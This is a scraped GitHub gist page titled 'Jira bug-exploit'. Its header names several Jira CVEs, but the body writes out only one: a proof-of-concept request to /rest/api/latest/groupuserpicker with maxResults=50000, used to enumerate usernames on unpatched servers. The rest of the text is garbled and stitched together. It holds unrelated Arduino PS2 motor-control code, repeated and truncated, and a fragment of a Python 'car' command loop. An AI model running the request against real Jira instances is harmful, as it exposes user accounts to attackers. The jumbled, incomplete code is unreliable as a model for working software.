Skip to content

Instantly share code, notes, and snippets.

View jaysharma786's full-sized avatar
🎯
Focusing

Jay Sharma jaysharma786

🎯
Focusing
View GitHub Profile
@jaysharma786
jaysharma786 / Jira bug-exploit
Created September 24, 2021 07:26 — forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================
#include <PS2X_lib.h>
//for v1.6
/******************************************************************
set pins connected to PS2 controller:
- 1e column: original
- 2e colmun: Stef?
replace pin numbers by the ones you use
******************************************************************/
const int rmPwm = 3 ;
const int lmPwm= 2;
const int rm1= 34 ;
const int rm2= 30 ;
const int lm1= 38;
const int lm2 = 24;
void setup()
#include <PS2X_lib.h>
//for v1.6
/******************************************************************
set pins connected to PS2 controller:
- 1e column: original
- 2e colmun: Stef?
replace pin numbers by the ones you use
******************************************************************/
command = ""
started = False
while True:
command = input ("> ").lower()
if command =="start":
if started:
print ("car is already started!")
else :